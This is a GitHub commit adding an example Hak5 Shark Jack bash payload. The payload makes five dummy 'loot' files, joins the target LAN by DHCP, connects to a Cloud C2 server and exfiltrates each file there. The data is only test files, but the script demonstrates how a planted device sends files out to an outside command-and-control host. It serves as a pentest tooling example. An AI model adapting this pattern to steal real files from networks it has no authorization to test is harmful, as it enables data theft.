Added example Cloud C2 multi-file exfil payload

pull/9/head
Darren Kitchen 2019-11-12 09:57:21 -08:00 committed by GitHub
parent a74bf50f98
commit d1ae047da6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
#!/bin/bash
#
# Title: Example Cloud C2 Multi-File Exfiltration Payload
# Author: Hak5Darren
# Version: 1.0
# Requirements: Firmware v1.1.0+, Cloud C2
#
# Description: This example payload demonstrates how to use C2EXFIL to
# exfiltrate multiple files to Cloud C2. Requires a Cloud C2 server
# setup and running (download from https://c2.hak5.org) and this
# Shark Jack to be provisioned (guide from https://docs.hak5.org)
LOOT_DIR=/root/loot/c2_exfil_example
LED SETUP
# Make 5 test loot files
mkdir -p $LOOT_DIR
for n in {1..5}; do dd if=/dev/zero of="$LOOT_DIR/file$n.txt" bs=1 count=1024; done
# Get an IP address on the target LAN
NETMODE DHCP_CLIENT
# Wait until the Shark Jack has an IP address
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
LED ATTACK
# Connect to Cloud C2
C2CONNECT
# Wait until Cloud C2 connection is established
while ! pgrep cc-client; do sleep 1; done
# Exfiltrate all test loot files
FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING $f Example; done
LED FINISH